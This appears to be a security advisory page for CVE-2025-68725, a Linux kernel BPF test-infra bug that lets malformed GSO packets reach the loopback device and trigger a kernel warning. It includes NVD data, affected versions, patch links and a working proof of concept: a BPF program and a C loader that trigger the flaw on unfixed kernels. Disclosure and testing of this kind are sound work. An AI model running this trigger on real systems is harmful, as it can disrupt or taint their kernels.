Security Vulnerability Report
CVE-2025-68725 CVSS 5.5 MEDIUM

CVE-2025-68725

Published: 2025-12-24 11:16:02
Last Modified: 2026-02-26 18:43:53
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

bpf: Do not let BPF test infra emit invalid GSO types to stack

Yinhao et al. reported that their fuzzer tool was able to trigger a skb_warn_bad_offload() from netif_skb_features() -> gso_features_check(). When a BPF program - triggered via BPF test infra - pushes the packet to the loopback device via bpf_clone_redirect() then the mentioned offload warning can be seen. GSO-related features are then rightfully disabled.

We get into this situation due to convert___skb_to_skb() setting gso_segs and gso_size but not gso_type. Technically, it makes sense that this warning triggers since the GSO properties are malformed due to the gso_type. Potentially, the gso_type could be marked non-trustworthy through setting it at least to SKB_GSO_DODGY without any other specific assumptions, but that also feels wrong given we should not go further into the GSO engine in the first place.

The checks were added in 121d57af308d ("gso: validate gso_type in GSO handlers") because there were malicious (syzbot) senders that combine a protocol with a non-matching gso_type. If we would want to drop such packets, gso_features_check() currently only returns feature flags via netif_skb_features(), so one location for potentially dropping such skbs could be validate_xmit_unreadable_skb(), but then otoh it would be an additional check in the fast-path for a very corner case. Given bpf_clone_redirect() is the only place where BPF test infra could emit such packets, let's reject them right there.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE (six version ranges, taken from the NVD configuration data in the raw JSON below; the upper bound of each range is the stable release carrying the fix)
Linux Kernel >= 5.6, < 5.10.249
Linux Kernel >= 5.11, < 5.15.199
Linux Kernel >= 5.16, < 6.1.162
Linux Kernel >= 6.2, < 6.6.122
Linux Kernel >= 6.7, < 6.12.68
Linux Kernel >= 6.13, < 6.18.2

Kernels before 5.6 are not listed as affected. Commit 121d57af308d ("gso: validate gso_type in GSO handlers"), cited in the description, is the commit that added the gso_type validation which emits the warning; it is not the commit that introduced the affected BPF test-infra code.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2025-68725 PoC - BPF test infra can emit GSO skbs with no gso_type
// BPF-side program. When it is executed through BPF_PROG_TEST_RUN
// (BPF_PROG_TYPE_SCHED_CLS) with a ctx_in __sk_buff whose gso_segs and
// gso_size are non-zero, convert___skb_to_skb() copies those two fields into
// the skb but never sets gso_type. Cloning that skb onto the loopback device
// makes netif_skb_features() -> gso_features_check() call skb_warn_bad_offload().
#include <linux/bpf.h>
#include <bpf/bpf_helpers.h>

#define LO_IFINDEX 1	/* loopback in the test netns; adjust if different */

SEC("tc")
int bpf_test_gsotype_trigger(struct __sk_buff *skb)
{
	/* bpf_clone_redirect() clones skb (shared-info GSO fields included)
	 * and transmits the clone on ifindex; flags 0 means egress. Its return
	 * value is what BPF_PROG_TEST_RUN reports as retval: 0 on an unfixed
	 * kernel, an error on a kernel where the helper rejects the malformed
	 * GSO skb. */
	return bpf_clone_redirect(skb, LO_IFINDEX, 0);
}

char _license[] SEC("license") = "GPL";

/* Vulnerability trigger conditions:
 * 1. The program is run via BPF test infra with gso_segs/gso_size set in ctx_in.
 * 2. convert___skb_to_skb() sets gso_segs and gso_size but not gso_type.
 * 3. bpf_clone_redirect() pushes the clone to the loopback device, where
 *    gso_features_check() sees a GSO skb without a gso_type and triggers
 *    skb_warn_bad_offload(); GSO features are then dropped for that skb.
 * Mitigation: reject such skbs in bpf_clone_redirect() before emission. */
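The trigger path in the Description depends on the user-space side of BPF test infra handing the kernel a __sk_buff context with gso_segs and gso_size set, which no BPF program on its own can do. The following loader is an added example written for this report (it is not kernel code and not taken from the commit): it drives the same bpf_clone_redirect()-to-loopback step using only the raw bpf(2) syscall, with the program hand-assembled as four instructions so nothing beyond the uapi header is needed. Assumptions: the loopback device is ifindex 1 in the namespace the program runs in, the gso_size/gso_segs values 64 and 2 are arbitrary non-zero choices, the data_in frame is a constructed all-zero buffer, and the exact errno returned by a fixed bpf_clone_redirect() is not stated in the report, so only the sign of retval is interpreted. It needs root (or CAP_BPF plus CAP_NET_ADMIN) and should be run only on a disposable test kernel, since on an unfixed kernel it produces the skb_warn_bad_offload() WARN.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/bpf.h>

/* Assumptions for this example (not from the report): lo is ifindex 1, and
 * the GSO values are arbitrary non-zero numbers below GSO_MAX_SEGS. */
#define LO_IFINDEX    1
#define TRIGGER_INSNS 4
#define CTX_GSO_SIZE  64
#define CTX_GSO_SEGS  2

static struct bpf_insn insn(uint8_t code, uint8_t dst, int32_t imm)
{
	struct bpf_insn i = { .code = code, .dst_reg = dst, .src_reg = 0, .off = 0, .imm = imm };
	return i;
}

/* Hand-assembled SCHED_CLS program equivalent to
 *   return bpf_clone_redirect(skb, LO_IFINDEX, 0);
 * r1 already holds the __sk_buff context on entry. Returns the number of
 * instructions written, or -1 if the buffer is too small. */
int build_trigger_prog(struct bpf_insn *out, size_t max)
{
	if (max < TRIGGER_INSNS)
		return -1;
	out[0] = insn(BPF_ALU64 | BPF_MOV | BPF_K, BPF_REG_2, LO_IFINDEX); /* r2 = ifindex */
	out[1] = insn(BPF_ALU64 | BPF_MOV | BPF_K, BPF_REG_3, 0);          /* r3 = flags   */
	out[2] = insn(BPF_JMP | BPF_CALL, 0, BPF_FUNC_clone_redirect);     /* r0 = helper  */
	out[3] = insn(BPF_JMP | BPF_EXIT, 0, 0);                           /* return r0    */
	return TRIGGER_INSNS;
}

/* ctx_in for BPF_PROG_TEST_RUN: only the GSO fields are non-zero. __sk_buff has
 * no gso_type member, so convert___skb_to_skb() builds a GSO skb (gso_size != 0)
 * whose gso_type stays 0, which is the malformed state the fix rejects. */
void build_gso_ctx(struct __sk_buff *ctx, uint32_t gso_size, uint32_t gso_segs)
{
	memset(ctx, 0, sizeof(*ctx));
	ctx->gso_size = gso_size;
	ctx->gso_segs = gso_segs;
}

static long bpf_cmd(int cmd, union bpf_attr *attr)
{
	return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

int main(void)
{
	struct bpf_insn prog[TRIGGER_INSNS];
	struct __sk_buff ctx;
	union bpf_attr attr;
	unsigned char frame[128];	/* constructed: all-zero L2 frame, contents irrelevant */
	char log[4096] = "";
	long fd, ret;

	build_trigger_prog(prog, TRIGGER_INSNS);
	build_gso_ctx(&ctx, CTX_GSO_SIZE, CTX_GSO_SEGS);
	memset(frame, 0, sizeof(frame));

	memset(&attr, 0, sizeof(attr));
	attr.prog_type = BPF_PROG_TYPE_SCHED_CLS;
	attr.insns     = (uint64_t)(uintptr_t)prog;
	attr.insn_cnt  = TRIGGER_INSNS;
	attr.license   = (uint64_t)(uintptr_t)"GPL";
	attr.log_buf   = (uint64_t)(uintptr_t)log;
	attr.log_size  = sizeof(log);
	attr.log_level = 1;
	fd = bpf_cmd(BPF_PROG_LOAD, &attr);
	if (fd < 0) {
		fprintf(stderr, "BPF_PROG_LOAD failed: %s\n%s", strerror(errno), log);
		return 1;
	}

	memset(&attr, 0, sizeof(attr));
	attr.test.prog_fd      = (uint32_t)fd;
	attr.test.data_in      = (uint64_t)(uintptr_t)frame;
	attr.test.data_size_in = sizeof(frame);
	attr.test.ctx_in       = (uint64_t)(uintptr_t)&ctx;
	attr.test.ctx_size_in  = sizeof(ctx);
	attr.test.repeat       = 1;
	ret = bpf_cmd(BPF_PROG_TEST_RUN, &attr);
	if (ret < 0) {
		fprintf(stderr, "BPF_PROG_TEST_RUN failed: %s\n", strerror(errno));
		close((int)fd);
		return 1;
	}

	/* retval is bpf_clone_redirect()'s return value: 0 means the typeless GSO
	 * clone was handed to lo (unfixed kernel; look for the skb_warn_bad_offload()
	 * WARN in dmesg), a negative value means the fixed helper rejected it. */
	printf("bpf_clone_redirect() returned %d -> %s\n", (int)attr.test.retval,
	       (int)attr.test.retval == 0 ? "accepted (fix absent)" : "rejected (fix present)");
	close((int)fd);
	return 0;
}
```

Build with a plain `cc` against the system uapi headers and run it as root in a throwaway VM; the test run never involves a real netdev other than loopback, so nothing leaves the host, but an unfixed kernel will log the WARN and taint itself. For a kernel where the report's fix is present the helper returns an error and retval is negative.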

References

https://git.kernel.org/stable/c/04a899573fb87273a656f178b5f920c505f68875 (Patch)
https://git.kernel.org/stable/c/0f3a60869ca22024dfb9c6fce412b0c70cb4ea36 (Patch)
https://git.kernel.org/stable/c/768376ece7036ecb8604961793a1b72afe6345dd (Patch)
https://git.kernel.org/stable/c/8670b53b8ee91f028f7240531064020b7413c461 (Patch)
https://git.kernel.org/stable/c/bb7902ed7d7f6d6a7c6c4dc25410d6127ce1085f (Patch)
https://git.kernel.org/stable/c/e0ffb64a2d72c6705b4a4c9efef600409f7e98a0 (Patch)
https://git.kernel.org/stable/c/fbea4c63b5385588cb44ab21f91e55e33c719a54 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68725", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-12-24T11:16:01.797", "lastModified": "2026-02-26T18:43:52.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -> gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "5.10.249", "matchCriteriaId": "130E98F6-F2B7-498A-A2FF-D360B3D340E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.199", "matchCriteriaId": "A247FBA6-BEB9-484F-B892-DD5517949CCD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.162", "matchCriteriaId": "6579E0D4-0641-479D-A4C3-0EF618798C55"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.122", "matchCriteriaId": "8EAAE395-0162-4BAF-9AD5-E9AF3C869C4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.68", "matchCriteriaId": "52F38E19-0FDD-4992-9D6D-D4169D689598"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.2", "matchCriteriaId": "BD6A474E-1AF3-4675-9A46-086E5D8F61CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/04a899573fb87273a656f178b5f920c505f68875", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0f3a60869ca22024dfb9c6fce412b0c70cb4ea36", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/768376ece7036ecb8604961793a1b72afe6345dd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8670b53b8ee91f028f7240531064020b7413c461", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bb7902ed7d7f6d6a7c6c4dc25410d6127ce1085f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e0ffb64a2d72c6705b4a4c9efef600409f7e98a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fbea4c63b5385588cb44ab21f91e55e33c719a54", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}